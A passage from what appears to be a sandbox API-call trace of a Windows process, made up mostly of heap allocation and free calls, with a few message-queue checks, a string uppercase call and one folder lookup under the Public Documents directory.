dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0223.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0223.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0223.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x29f7878 [0223.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0223.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0223.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0223.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0223.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0223.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0223.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0223.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0223.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0223.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0223.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0223.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0223.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0223.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0223.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0223.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0223.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0223.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0223.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0223.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0223.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.312] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0223.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0223.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0223.313] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0223.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0223.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0223.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0223.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0223.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0223.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0223.313] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0223.313] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0223.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0223.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0223.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0223.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0223.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0223.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0223.314] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0223.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0223.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0223.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0223.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0223.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0223.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0223.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0223.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0223.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0223.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0223.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0223.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0223.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0223.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0223.327] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0223.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0223.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0223.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0223.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.328] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0223.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0223.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0223.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0223.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.329] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents/My Music", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8cf1d0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 0x9e2078 [0223.329] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0223.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0223.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0223.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0223.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0223.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.330] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0223.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0223.330] HeapFree (in: 